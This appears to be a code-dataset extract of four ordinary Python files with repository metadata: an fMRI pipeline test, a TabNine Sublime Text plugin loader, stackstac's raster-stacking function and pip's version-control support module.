def test_fullrunhappy_v1(debug=False, display=False):
    """Run a full happy pipeline pass on the example dataset.

    Uses the revised cardiac model with the spatial GLM and aliased
    correlation enabled. The ``debug``/``display`` flags are accepted for
    harness consistency; this variant does not consume them.
    """
    example_root = get_examples_path()
    # Positional arguments: input fMRI image, slice-timing json, output root.
    cli_args = [
        os.path.join(example_root, "sub-HAPPYTEST.nii.gz"),
        os.path.join(example_root, "sub-HAPPYTEST.json"),
        os.path.join(get_test_temp_path(), "happyout"),
    ]
    # Option flags for this pipeline variant.
    cli_args += ["--mklthreads", "-1"]
    cli_args += ["--spatialglm"]
    cli_args += ["--model", "model_revised"]
    cli_args += ["--aliasedcorrelation"]
    happy_workflow.happy_main(happy_parser.process_args(inputargs=cli_args))
def main():
    # Manual entry point: enable debug output and display when run directly.
    test_fullrunhappy_v1(debug=True, display=True)
if __name__ == "__main__":
    # Select an interactive matplotlib backend before any figures are created.
    mpl.use("TkAgg")
    main()
| 29.764706
| 88
| 0.700922
|
794b31c8adfa189efdf1d8599651274f6d8f568e
| 2,045
|
py
|
Python
|
TabNine.py
|
fearoffish/tabnine-sublime
|
8ded738a0713546aa36bd61e36460d335e6e1320
|
[
"MIT"
] | null | null | null |
TabNine.py
|
fearoffish/tabnine-sublime
|
8ded738a0713546aa36bd61e36460d335e6e1320
|
[
"MIT"
] | null | null | null |
TabNine.py
|
fearoffish/tabnine-sublime
|
8ded738a0713546aa36bd61e36460d335e6e1320
|
[
"MIT"
] | null | null | null |
import sublime_plugin
import sublime
import sys

# Build 3114 is the first Sublime Text release with the plugin-host features
# this package relies on.
_is_ST3 = int(sublime.version()) >= 3114
if _is_ST3:
    # Clear module cache to force reloading all modules of this package.
    # See https://github.com/emmetio/sublime-text-plugin/issues/35
    prefix = __package__ + "."  # don't clear the base package
    for module_name in [
        module_name
        for module_name in sys.modules
        if (module_name.startswith(prefix) and module_name != __name__)
        or ("json" == module_name)
    ]:
        del sys.modules[module_name]
    prefix = None

# These imports must come after the cache purge so fresh modules are loaded.
from .lib.requests import get_capabilities, set_state  # noqa E402
from .lib.settings import is_native_auto_complete  # noqa E402

capabilities = get_capabilities()

# Select the completion implementation: v2 is used when the native
# autocomplete setting is on, or when the server advertises the
# "sublime.new-experience" feature flag.
is_v2 = False
if is_native_auto_complete() or (
    capabilities["enabled_features"]
    and "sublime.new-experience" in capabilities["enabled_features"]
):
    is_v2 = True
    from .completions.completions_v2 import *
else:
    from .completions.completions_v1 import *
class DisableViewCommand(sublime_plugin.TextCommand):
    """Disable TabNine for the current view and report the state change."""

    def run(self, edit):
        view_settings = self.view.settings()
        view_settings.set("tabnine-disabled", True)
        set_state({"State": {"state_type": "disable-view"}})

    def is_visible(self, *args):
        # Only offered under the v2 experience, and only while still enabled.
        already_disabled = self.view.settings().get("tabnine-disabled", False)
        return is_v2 and not already_disabled
class EnableViewCommand(sublime_plugin.TextCommand):
    """Re-enable TabNine for the current view and report the state change."""

    def run(self, edit):
        view_settings = self.view.settings()
        view_settings.set("tabnine-disabled", False)
        set_state({"State": {"state_type": "enable-view"}})

    def is_visible(self, *args):
        # Only offered under the v2 experience, and only while disabled.
        currently_disabled = self.view.settings().get("tabnine-disabled", False)
        return is_v2 and currently_disabled
class EnableNativeAutoCompleteCommand(sublime_plugin.TextCommand):
    """Switch to the native-autocomplete (v2) experience and reload the plugin."""

    def run(self, edit):
        plugin_settings = sublime.load_settings("TabNine.sublime-settings")
        plugin_settings.set("native_auto_complete", True)
        sublime.save_settings("TabNine.sublime-settings")
        # Reload the plugin so the module-level v1/v2 selection runs again.
        sublime_plugin.unload_plugin(__name__)
        sublime_plugin.reload_plugin(__name__)

    def is_visible(self, *args):
        # Pointless once v2 is already active.
        return not is_v2
| 30.984848
| 80
| 0.696333
|
794b33b6d3be04c7903d1da2075c7592d2fecfdf
| 15,111
|
py
|
Python
|
stackstac/stack.py
|
RichardScottOZ/stackstac
|
9e7ba8e76fe0749c3a931adda3e2074dcf8f43d6
|
[
"MIT"
] | null | null | null |
stackstac/stack.py
|
RichardScottOZ/stackstac
|
9e7ba8e76fe0749c3a931adda3e2074dcf8f43d6
|
[
"MIT"
] | null | null | null |
stackstac/stack.py
|
RichardScottOZ/stackstac
|
9e7ba8e76fe0749c3a931adda3e2074dcf8f43d6
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from typing import AbstractSet, List, Literal, Optional, Sequence, Type, Union
import numpy as np
import xarray as xr
import dask
from rasterio.enums import Resampling
from .prepare import prepare_items, to_attrs, to_coords
from .raster_spec import Bbox, IntFloat, Resolutions
from .reader_protocol import Reader
from .rio_env import LayeredEnv
from .rio_reader import AutoParallelRioReader
from .stac_types import ItemCollectionIsh, ItemIsh, items_to_plain
from .to_dask import items_to_dask
def stack(
    items: Union[ItemCollectionIsh, ItemIsh],
    assets: Optional[Union[List[str], AbstractSet[str]]] = frozenset(
        ["image/tiff", "image/x.geotiff", "image/vnd.stac.geotiff", "image/jp2"]
    ),
    epsg: Optional[int] = None,
    resolution: Optional[Union[IntFloat, Resolutions]] = None,
    bounds: Optional[Bbox] = None,
    bounds_latlon: Optional[Bbox] = None,
    snap_bounds: bool = True,
    resampling: Resampling = Resampling.nearest,
    chunksize: int = 1024,
    dtype: np.dtype = np.dtype("float64"),
    fill_value: Optional[Union[int, float]] = np.nan,
    rescale: bool = True,
    sortby_date: Literal["asc", "desc", False] = "asc",
    xy_coords: Literal["center", "topleft", False] = "center",
    properties: Union[bool, str, Sequence[str]] = True,
    band_coords: bool = True,
    gdal_env: Optional[LayeredEnv] = None,
    reader: Type[Reader] = AutoParallelRioReader,
) -> xr.DataArray:
    """
    Create an `xarray.DataArray` of all the STAC items, reprojected to the same grid and stacked by time.

    The DataArray's dimensions will be ``("time", "band", "y", "x")``. It's backed by
    a lazy `Dask array <dask.array.Array>`, so you can manipulate it without touching any data.

    We'll try to choose the output coordinate reference system, resolution, and bounds
    based on the metadata in the STAC items. However, if not all items have the necessary
    metadata, or aren't in the same coordinate reference system, you'll have specify these
    yourself---``epsg`` and ``resolution`` are the two parameters you'll set most often.

    Examples
    --------
    >>> import stackstac
    >>> import satsearch
    >>> items = satsearch.Search(...).items()
    >>> # Use default CRS, resolution, bounding box, etc.
    >>> xr_stack = stackstac.stack(items)
    >>>
    >>> # Reproject to 100-meter resolution in web mercator
    >>> xr_stack = stackstac.stack(items, epsg=3857, resolution=100)
    >>>
    >>> # Only use specific asset IDs
    >>> xr_stack = stackstac.stack(items, assets=["B01", "B03", "B02"])
    >>>
    >>> # Clip to a custom bounding box
    >>> xr_stack = stackstac.stack(items, bounds_latlon=[-106.2, 35.6, -105.6, 36])
    >>>
    >>> # Turn off all metadata if you don't need it
    >>> xr_stack = stackstac.stack(
    ...     items, properties=False, bands_coords=False, xy_coords=False, sortby_date=False
    ... )
    >>>
    >>> # Custom dtype and fill_value
    >>> xr_stack = stackstac.stack(items, rescale=False, fill_value=0, dtype="uint16")

    Note
    ----
    Don't be scared of all the parameters!

    Though there are lots of options, you can leave nearly all of them as their defaults.

    Parameters
    ----------
    items:
        The STAC items to stack. Can be a plain Python list of dicts
        following the STAC JSON specification, or objects from
        the `satstac <https://github.com/sat-utils/sat-stac>`_ (preferred),
        `pystac <https://github.com/stac-utils/pystac>`_, or
        `pystac-client <https://github.com/stac-utils/pystac-client>`_
        libraries.
    assets:
        Which asset IDs to use. Any Items missing a particular Asset will return an array
        of ``fill_value`` for that Asset. By default, returns all assets with a GeoTIFF
        or JPEG2000 ``type``.

        If None, all assets are used.

        If a list of strings, those asset IDs are used.

        If a set, only assets compatible with those mimetypes are used (according to the
        ``type`` field on each asset). Note that if you give ``assets={"image/tiff"}``,
        and the asset ``B1`` has ``type="image/tiff"`` on some items but ``type="image/png"``
        on others, then ``B1`` will not be included. Mimetypes structure is respected, so
        ``image/tiff`` will also match ``image/tiff; application=geotiff``; ``image`` will match
        ``image/tiff`` and ``image/jp2``, etc. See the `STAC common media types <MT>`_ for ideas.

        Note: each asset's data must contain exactly one band. Multi-band assets (like an RGB GeoTIFF)
        are not yet supported.

        .. _MT: https://github.com/radiantearth/stac-spec/blob/master/best-practices.md#common-media-types-in-stac
    epsg:
        Reproject into this coordinate reference system, as given by an `EPSG code <http://epsg.io>`_.
        If None (default), uses whatever CRS is set on all the items. In this case, all Items/Assets
        must have the ``proj:epsg`` field, and it must be the same value for all of them.
    resolution:
        Output resolution. Careful: this must be given in the output CRS's units!
        For example, with ``epsg=4326`` (meaning lat-lon), the units are degrees of
        latitude/longitude, not meters. Giving ``resolution=20`` in that case would mean
        each pixel is 20ºx20º (probably not what you wanted). You can also give pair of
        ``(x_resolution, y_resolution)``.

        If None (default), we try to calculate each Asset's resolution based on whatever metadata is available,
        and pick the minimum of all the resolutions---meaning by default, all data will be upscaled to
        match the "finest" or "highest-resolution" Asset.

        To estimate resolution, these combinations of fields must be set on each Asset or Item
        (in order of preference):

        * The ``proj:transform`` and ``proj:epsg`` fields
        * The ``proj:shape`` and one of ``proj:bbox`` or ``bbox`` fields
    bounds:
        Output spatial bounding-box, as a tuple of ``(min_x, min_y, max_x, max_y)``.
        This defines the ``(west, south, east, north)`` rectangle the output array will cover.
        Values must be in the same coordinate reference system as ``epsg``.

        If None (default), the bounding box of all the input items is automatically used.
        (This only requires the ``bbox`` field to be set on each Item, which is a required
        field in the STAC specification, so only in rare cases will auto-calculating the bounds
        fail.) So in most cases, you can leave ``bounds`` as None. You'd only need to set it
        when you want to use a custom bounding box.

        When ``bounds`` is given, any assets that don't overlap those bounds are dropped.
    bounds_latlon:
        Same as ``bounds``, but given in degrees (latitude and longitude) for convenience.
        Only one of ``bounds`` and ``bounds_latlon`` can be used.
    snap_bounds:
        Whether to snap the bounds to whole-number intervals of ``resolution`` to prevent
        fraction-of-a-pixel offsets. Default: True.

        This is equivalent to the ``-tap`` or
        `target-align pixels <https://gis.stackexchange.com/questions/165402/how-to-use-tap-in-gdal-rasterize>`_
        argument in GDAL.
    resampling:
        The rasterio resampling method to use when reprojecting or rescaling data to a different CRS or resolution.
        Default: ``rasterio.enums.Resampling.nearest``.
    chunksize:
        The chunksize to use for the spatial component of the Dask array, in pixels.
        Default: 1024. Can be given in any format Dask understands for a ``chunks=`` argument,
        such as ``1024``, ``(1024, 2048)``, ``15 MB``, etc.

        This is basically the "tile size" all your operations will be parallelized over.
        Generally, you should use the internal tile size/block size of whatever data
        you're accessing (or a multiple of that). For example, if all the assets are in
        Cloud-Optimized GeoTIFF files with an internal tilesize of 512, pass ``chunksize=512``.
        You want the chunks of the Dask array to align with the internal tiles of the data.
        Otherwise, if those grids don't line up, processing one chunk of your Dask array could
        require reading many tiles from the data, parts of which will then be thrown out.
        Additionally, those same data tiles might need to be re-read (and re-thrown-out)
        for a neighboring Dask chunk, which is just as inefficient as it sounds (though setting
        a high ``GDAL_CACHEMAX`` via ``gdal_env`` will help keep more data tiles cached,
        at the expense of using more memory).

        Of course, when reprojecting data to a new grid, the internal tilings of each input
        almost certainly won't line up anyway, so some misalignment is inevitable, and not
        that big of a deal.

        **This is the one parameter we can't pick for you automatically**, because the STAC
        specification offers no metadata about the internal tiling of the assets. We'd
        have to open the data files to find out, which is very slow. But to make an educated
        guess, you should look at ``rasterio.open(url).block_shapes`` for a few sample assets.

        The most important thing to avoid is making your ``chunksize`` here *smaller* than
        the internal tilesize of the data. If you want small Dask chunks for other reasons,
        don't set it here---instead, call ``.chunk`` on the DataArray to re-chunk it.
    dtype:
        The NumPy data type of the output array. Default: ``float64``. Must be a data type
        that's compatible with ``fill_value``. Note that if ``fill_value`` is None, whatever nodata
        value is set in each asset's file will be used, so that value needs to be compatible
        with ``dtype`` as well.
    fill_value:
        Value to fill nodata/masked pixels with. Default: ``np.nan``.

        Using NaN is generally the best approach, since many functions already know how to
        handle/propagate NaNs, or have NaN-equivalents (``dask.array.nanmean`` vs ``dask.array.mean``,
        for example). However, NaN requires a floating-point ``dtype``. If you know the data can
        be represented in a smaller data type (like ``uint16``), using a different ``fill_value``
        (like 0) and managing it yourself could save a lot of memory.
    rescale:
        Whether to rescale pixel values by the scale and offset set on the dataset.
        Default: True. Note that this could produce floating-point data when the
        original values are ints, so set ``dtype`` accordingly. You will NOT be warned
        if the cast to ``dtype`` is losing information!
    sortby_date:
        Whether to pre-sort the items by date (from the ``properties["datetime"]`` field).
        One of ``"asc"``, ``"desc"``, or False to disable sorting. Default: ``"asc"``.
        Note that if you set ``sortby_date=False``, selecting date ranges from the DataArray
        (like ``da.loc["2020-01":"2020-04"]``) may behave strangely, because xarray/pandas
        needs indexes to be sorted.
    xy_coords:
        Whether to add geospatial coordinate labels for the ``x`` and ``y`` dimensions of the DataArray,
        allowing for spatial indexing. The coordinates will be in the coordinate reference system given
        by ``epsg``

        If ``"center"`` (default), the coordinates are for each pixel's centroid, following xarray conventions.

        If ``"topleft"``, the coordinates are for each pixel's upper-left corner.

        If False, ``x`` and ``y`` will just be indexed by row/column numbers, saving a small amount of time
        and local memory.
    properties:
        Which fields from each STAC Item's ``properties`` to add as coordinates to the DataArray, indexing the "time"
        dimension.

        If None (default), all properties will be used. If a string or sequence of strings, only those fields
        will be used. For each Item missing a particular field, its value for that Item will be None.

        If False, no properties will be added.
    band_coords:
        Whether to include Asset-level metadata as coordinates for the ``bands`` dimension.

        If True (default), for each asset ID, the field(s) that have the same value across all Items
        will be added as coordinates.

        The ``eo:bands`` field is also unpacked if present, and ``sar:polarizations`` is renamed to
        ``polarization`` for convenience.
    gdal_env:
        Advanced use: a `~.LayeredEnv` of GDAL configuration options to use while opening
        and reading datasets. If None (default), `~.DEFAULT_GDAL_ENV` is used.
        See ``rio_reader.py`` for notes on why these default options were chosen.
    reader:
        Advanced use: the `~.Reader` type to use. Currently there is only one real reader type:
        `~.AutoParallelRioReader`. However, there's also `~.FakeReader` (which doesn't read data at all,
        just returns random numbers), which can be helpful for isolating whether performace issues are
        due to IO and GDAL, or inherent to dask.

    Returns
    -------
    xarray.DataArray:
        xarray DataArray, backed by a Dask array. No IO will happen until calling ``.compute()``,
        or accessing ``.values``. The dimensions will be ``("time", "band", "y", "x")``.

        ``time`` will be equal in length to the number of items you pass in, and indexed by STAC Item datetime.
        Note that this means multiple entries could have the same index. Note also datetime strings are cast to
        'UTC' but passed to xarray without timezone information (dtype='datetime64[ns]').

        ``band`` will be equal in length to the number of asset IDs used (see the ``assets`` parameter for more).

        The size of ``y`` and ``x`` will be determined by ``resolution`` and ``bounds``, which in many cases are
        automatically computed from the items you pass in.
    """
    # Normalize any supported item container (satstac/pystac/plain dicts)
    # into a plain list of dicts.
    plain_items = items_to_plain(items)

    if sortby_date is not False:
        # Items missing "datetime" sort first (empty string sorts lowest).
        plain_items = sorted(
            plain_items,
            key=lambda item: item["properties"].get("datetime", ""),
            reverse=sortby_date == "desc",
        )  # type: ignore

    # Resolve CRS/resolution/bounds and drop assets outside the bounds;
    # returns the (possibly filtered) item list alongside the asset table.
    asset_table, spec, asset_ids, plain_items = prepare_items(
        plain_items,
        assets=assets,
        epsg=epsg,
        resolution=resolution,
        bounds=bounds,
        bounds_latlon=bounds_latlon,
        snap_bounds=snap_bounds,
    )
    # Build the lazy 4-D dask array; no IO happens here.
    arr = items_to_dask(
        asset_table,
        spec,
        chunksize=chunksize,
        dtype=dtype,
        resampling=resampling,
        fill_value=fill_value,
        rescale=rescale,
        reader=reader,
        gdal_env=gdal_env,
    )

    return xr.DataArray(
        arr,
        *to_coords(
            plain_items,
            asset_ids,
            spec,
            xy_coords=xy_coords,
            properties=properties,
            band_coords=band_coords,
        ),
        attrs=to_attrs(spec),
        # Deterministic name keyed off the dask graph contents.
        name="stackstac-" + dask.base.tokenize(arr)
    )
| 49.061688
| 117
| 0.666733
|
794b35d6564a5c310e9eae4a86714dff5817b1c4
| 16,319
|
py
|
Python
|
apim-migration-testing-tool/Python/venv/lib/python3.6/site-packages/pip/_internal/vcs/__init__.py
|
tharindu1st/apim-migration-resources
|
dd68aa8c53cf310392bb72e699dd24c57b109cfb
|
[
"Apache-2.0"
] | 69
|
2019-02-18T12:07:35.000Z
|
2022-03-12T10:38:32.000Z
|
venv/lib/python3.7/site-packages/pip/_internal/vcs/__init__.py
|
John1001Song/Big-Data-Robo-Adviser
|
9444dce96954c546333d5aecc92a06c3bfd19aa5
|
[
"MIT"
] | 64
|
2020-04-16T13:35:27.000Z
|
2022-03-31T04:37:41.000Z
|
venv/lib/python3.7/site-packages/pip/_internal/vcs/__init__.py
|
John1001Song/Big-Data-Robo-Adviser
|
9444dce96954c546333d5aecc92a06c3bfd19aa5
|
[
"MIT"
] | 78
|
2020-06-19T09:41:01.000Z
|
2022-02-05T00:13:29.000Z
|
"""Handles all VCS (version control) support"""
from __future__ import absolute_import
import errno
import logging
import os
import shutil
import sys
from pip._vendor.six.moves.urllib import parse as urllib_parse
from pip._internal.exceptions import BadCommand
from pip._internal.utils.misc import (
display_path, backup_dir, call_subprocess, rmtree, ask_path_exists,
)
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Dict, Optional, Tuple # noqa: F401
from pip._internal.cli.base_command import Command # noqa: F401
__all__ = ['vcs', 'get_src_requirement']
logger = logging.getLogger(__name__)
class RevOptions(object):

    """
    Encapsulates a VCS-specific revision to install, along with any VCS
    install options.

    Instances of this class should be treated as if immutable.
    """

    def __init__(self, vcs, rev=None, extra_args=None):
        """
        Args:
          vcs: a VersionControl object.
          rev: the name of the revision to install.
          extra_args: a list of extra options.
        """
        self.extra_args = [] if extra_args is None else extra_args
        self.rev = rev
        self.vcs = vcs

    def __repr__(self):
        return '<RevOptions %s: rev=%r>' % (self.vcs.name, self.rev)

    @property
    def arg_rev(self):
        # Fall back to the backend's default when no explicit rev was given.
        return self.vcs.default_arg_rev if self.rev is None else self.rev

    def to_args(self):
        """
        Return the VCS-specific command arguments.
        """
        rev = self.arg_rev
        base_args = self.vcs.get_base_rev_args(rev) if rev is not None else []
        return base_args + self.extra_args

    def to_display(self):
        return ' (to revision {})'.format(self.rev) if self.rev else ''

    def make_new(self, rev):
        """
        Make a copy of the current instance, but with a new rev.

        Args:
          rev: the name of the revision for the new object.
        """
        return self.vcs.make_rev_options(rev, extra_args=self.extra_args)
class VcsSupport(object):
    # Maps backend name -> VersionControl subclass. NOTE: this is a class
    # attribute, so all VcsSupport instances share one registry.
    _registry = {}  # type: Dict[str, Command]
    schemes = ['ssh', 'git', 'hg', 'bzr', 'sftp', 'svn']

    def __init__(self):
        # Register more schemes with urlparse for various version control
        # systems
        urllib_parse.uses_netloc.extend(self.schemes)
        # Python >= 2.7.4, 3.3 doesn't have uses_fragment
        if getattr(urllib_parse, 'uses_fragment', None):
            urllib_parse.uses_fragment.extend(self.schemes)
        super(VcsSupport, self).__init__()

    def __iter__(self):
        # Iterates over registered backend names.
        return self._registry.__iter__()

    @property
    def backends(self):
        return list(self._registry.values())

    @property
    def dirnames(self):
        # The marker directory of each backend (e.g. '.git', '.hg').
        return [backend.dirname for backend in self.backends]

    @property
    def all_schemes(self):
        schemes = []
        for backend in self.backends:
            schemes.extend(backend.schemes)
        return schemes

    def register(self, cls):
        """Register a VersionControl subclass; first registration wins."""
        if not hasattr(cls, 'name'):
            logger.warning('Cannot register VCS %s', cls.__name__)
            return
        if cls.name not in self._registry:
            self._registry[cls.name] = cls
            logger.debug('Registered VCS backend: %s', cls.name)

    def unregister(self, cls=None, name=None):
        # The name, when given, takes precedence over the class.
        if name in self._registry:
            del self._registry[name]
        elif cls in self._registry.values():
            del self._registry[cls.name]
        else:
            logger.warning('Cannot unregister because no class or name given')

    def get_backend_name(self, location):
        """
        Return the name of the version control backend if found at given
        location, e.g. vcs.get_backend_name('/path/to/vcs/checkout')
        """
        for vc_type in self._registry.values():
            if vc_type.controls_location(location):
                logger.debug('Determine that %s uses VCS: %s',
                             location, vc_type.name)
                return vc_type.name
        return None

    def get_backend(self, name):
        # Returns None implicitly when the name is unknown.
        name = name.lower()
        if name in self._registry:
            return self._registry[name]

    def get_backend_from_location(self, location):
        vc_type = self.get_backend_name(location)
        if vc_type:
            return self.get_backend(vc_type)
        return None
# Module-level singleton registry; VCS backends register themselves here.
vcs = VcsSupport()
class VersionControl(object):
    """Base class for VCS backends (git, hg, svn, bzr subclass this)."""
    name = ''
    dirname = ''
    # List of supported schemes for this Version Control
    schemes = ()  # type: Tuple[str, ...]
    # Iterable of environment variable names to pass to call_subprocess().
    unset_environ = ()  # type: Tuple[str, ...]
    default_arg_rev = None  # type: Optional[str]

    def __init__(self, url=None, *args, **kwargs):
        self.url = url
        super(VersionControl, self).__init__(*args, **kwargs)

    def get_base_rev_args(self, rev):
        """
        Return the base revision arguments for a vcs command.

        Args:
          rev: the name of a revision to install.  Cannot be None.
        """
        raise NotImplementedError

    def make_rev_options(self, rev=None, extra_args=None):
        """
        Return a RevOptions object.

        Args:
          rev: the name of a revision to install.
          extra_args: a list of extra options.
        """
        return RevOptions(self, rev, extra_args=extra_args)

    def _is_local_repository(self, repo):
        """
        posix absolute paths start with os.path.sep,
        win32 ones start with drive (like c:\\folder)
        """
        # NOTE: returns the drive string (truthy) rather than True on win32.
        drive, tail = os.path.splitdrive(repo)
        return repo.startswith(os.path.sep) or drive

    def export(self, location):
        """
        Export the repository at the url to the destination location
        i.e. only download the files, without vcs informations
        """
        raise NotImplementedError

    def get_netloc_and_auth(self, netloc, scheme):
        """
        Parse the repository URL's netloc, and return the new netloc to use
        along with auth information.

        Args:
          netloc: the original repository URL netloc.
          scheme: the repository URL's scheme without the vcs prefix.

        This is mainly for the Subversion class to override, so that auth
        information can be provided via the --username and --password options
        instead of through the URL.  For other subclasses like Git without
        such an option, auth information must stay in the URL.

        Returns: (netloc, (username, password)).
        """
        return netloc, (None, None)

    def get_url_rev_and_auth(self, url):
        """
        Parse the repository URL to use, and return the URL, revision,
        and auth info to use.

        Returns: (url, rev, (username, password)).
        """
        scheme, netloc, path, query, frag = urllib_parse.urlsplit(url)
        if '+' not in scheme:
            raise ValueError(
                "Sorry, {!r} is a malformed VCS url. "
                "The format is <vcs>+<protocol>://<url>, "
                "e.g. svn+http://myrepo/svn/MyApp#egg=MyApp".format(url)
            )
        # Remove the vcs prefix.
        scheme = scheme.split('+', 1)[1]
        netloc, user_pass = self.get_netloc_and_auth(netloc, scheme)
        rev = None
        if '@' in path:
            # Everything after the last '@' in the path is the revision.
            path, rev = path.rsplit('@', 1)
        url = urllib_parse.urlunsplit((scheme, netloc, path, query, ''))
        return url, rev, user_pass

    def make_rev_args(self, username, password):
        """
        Return the RevOptions "extra arguments" to use in obtain().
        """
        return []

    def get_url_rev_options(self, url):
        """
        Return the URL and RevOptions object to use in obtain() and in
        some cases export(), as a tuple (url, rev_options).
        """
        url, rev, user_pass = self.get_url_rev_and_auth(url)
        username, password = user_pass
        extra_args = self.make_rev_args(username, password)
        rev_options = self.make_rev_options(rev, extra_args=extra_args)

        return url, rev_options

    def normalize_url(self, url):
        """
        Normalize a URL for comparison by unquoting it and removing any
        trailing slash.
        """
        return urllib_parse.unquote(url).rstrip('/')

    def compare_urls(self, url1, url2):
        """
        Compare two repo URLs for identity, ignoring incidental differences.
        """
        return (self.normalize_url(url1) == self.normalize_url(url2))

    def fetch_new(self, dest, url, rev_options):
        """
        Fetch a revision from a repository, in the case that this is the
        first fetch from the repository.

        Args:
          dest: the directory to fetch the repository to.
          rev_options: a RevOptions object.
        """
        raise NotImplementedError

    def switch(self, dest, url, rev_options):
        """
        Switch the repo at ``dest`` to point to ``URL``.

        Args:
          rev_options: a RevOptions object.
        """
        raise NotImplementedError

    def update(self, dest, url, rev_options):
        """
        Update an already-existing repo to the given ``rev_options``.

        Args:
          rev_options: a RevOptions object.
        """
        raise NotImplementedError

    def is_commit_id_equal(self, dest, name):
        """
        Return whether the id of the current commit equals the given name.

        Args:
          dest: the repository directory.
          name: a string name.
        """
        raise NotImplementedError

    def obtain(self, dest):
        """
        Install or update in editable mode the package represented by this
        VersionControl object.

        Args:
          dest: the repository directory in which to install or update.
        """
        url, rev_options = self.get_url_rev_options(self.url)

        # Fresh checkout: nothing at dest yet.
        if not os.path.exists(dest):
            self.fetch_new(dest, url, rev_options)
            return

        rev_display = rev_options.to_display()
        if self.is_repository_directory(dest):
            existing_url = self.get_url(dest)
            if self.compare_urls(existing_url, url):
                # Same repo already checked out: update in place if the
                # commit doesn't already match.
                logger.debug(
                    '%s in %s exists, and has correct URL (%s)',
                    self.repo_name.title(),
                    display_path(dest),
                    url,
                )
                if not self.is_commit_id_equal(dest, rev_options.rev):
                    logger.info(
                        'Updating %s %s%s',
                        display_path(dest),
                        self.repo_name,
                        rev_display,
                    )
                    self.update(dest, url, rev_options)
                else:
                    logger.info('Skipping because already up-to-date.')
                return

            # Same VCS, different URL: offer to switch as well.
            logger.warning(
                '%s %s in %s exists with URL %s',
                self.name,
                self.repo_name,
                display_path(dest),
                existing_url,
            )
            prompt = ('(s)witch, (i)gnore, (w)ipe, (b)ackup ',
                      ('s', 'i', 'w', 'b'))
        else:
            # dest exists but isn't a checkout of this VCS.
            logger.warning(
                'Directory %s already exists, and is not a %s %s.',
                dest,
                self.name,
                self.repo_name,
            )
            prompt = ('(i)gnore, (w)ipe, (b)ackup ', ('i', 'w', 'b'))

        logger.warning(
            'The plan is to install the %s repository %s',
            self.name,
            url,
        )
        response = ask_path_exists('What to do?  %s' % prompt[0], prompt[1])

        # NOTE(review): 'a' (abort) is not in the prompt choices above --
        # presumably ask_path_exists can return it via PIP_EXISTS_ACTION;
        # confirm against pip._internal.utils.misc.
        if response == 'a':
            sys.exit(-1)

        if response == 'w':
            logger.warning('Deleting %s', display_path(dest))
            rmtree(dest)
            self.fetch_new(dest, url, rev_options)
            return

        if response == 'b':
            dest_dir = backup_dir(dest)
            logger.warning(
                'Backing up %s to %s', display_path(dest), dest_dir,
            )
            shutil.move(dest, dest_dir)
            self.fetch_new(dest, url, rev_options)
            return

        # Do nothing if the response is "i".

        if response == 's':
            logger.info(
                'Switching %s %s to %s%s',
                self.repo_name,
                display_path(dest),
                url,
                rev_display,
            )
            self.switch(dest, url, rev_options)

    def unpack(self, location):
        """
        Clean up current location and download the url repository
        (and vcs infos) into location
        """
        if os.path.exists(location):
            rmtree(location)
        self.obtain(location)

    def get_src_requirement(self, dist, location):
        """
        Return a string representing the requirement needed to
        redownload the files currently present in location, something
        like:
          {repository_url}@{revision}#egg={project_name}-{version_identifier}
        """
        raise NotImplementedError

    def get_url(self, location):
        """
        Return the url used at location
        """
        raise NotImplementedError

    def get_revision(self, location):
        """
        Return the current commit id of the files at the given location.
        """
        raise NotImplementedError

    def run_command(self, cmd, show_stdout=True, cwd=None,
                    on_returncode='raise',
                    command_desc=None,
                    extra_environ=None, spinner=None):
        """
        Run a VCS subcommand
        This is simply a wrapper around call_subprocess that adds the VCS
        command name, and checks that the VCS is available
        """
        cmd = [self.name] + cmd
        try:
            return call_subprocess(cmd, show_stdout, cwd,
                                   on_returncode,
                                   command_desc, extra_environ,
                                   unset_environ=self.unset_environ,
                                   spinner=spinner)
        except OSError as e:
            # errno.ENOENT = no such file or directory
            # In other words, the VCS executable isn't available
            if e.errno == errno.ENOENT:
                raise BadCommand(
                    'Cannot find command %r - do you have '
                    '%r installed and in your '
                    'PATH?' % (self.name, self.name))
            else:
                raise  # re-raise exception if a different error occurred

    @classmethod
    def is_repository_directory(cls, path):
        """
        Return whether a directory path is a repository directory.
        """
        logger.debug('Checking in %s for %s (%s)...',
                     path, cls.dirname, cls.name)
        return os.path.exists(os.path.join(path, cls.dirname))

    @classmethod
    def controls_location(cls, location):
        """
        Check if a location is controlled by the vcs.
        It is meant to be overridden to implement smarter detection
        mechanisms for specific vcs.

        This can do more than is_repository_directory() alone.  For example,
        the Git override checks that Git is actually available.
        """
        return cls.is_repository_directory(location)
def get_src_requirement(dist, location):
    """Compute the requirement string for the editable checkout at ``location``.

    Looks up the VCS backend controlling ``location`` and asks it for a
    pinned ``{url}@{rev}#egg=...`` requirement.  Falls back to
    ``dist.as_requirement()`` — after logging a warning — when no
    backend controls the directory or the VCS command is not installed.
    """
    backend = vcs.get_backend_from_location(location)
    if not backend:
        logger.warning(
            'cannot determine version of editable source in %s (is not SVN '
            'checkout, Git clone, Mercurial clone or Bazaar branch)',
            location,
        )
        return dist.as_requirement()
    try:
        return backend().get_src_requirement(dist, location)
    except BadCommand:
        logger.warning(
            'cannot determine version of editable source in %s '
            '(%s command not found in path)',
            location,
            backend.name,
        )
        return dist.as_requirement()
| 31.998039
| 78
| 0.57001
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.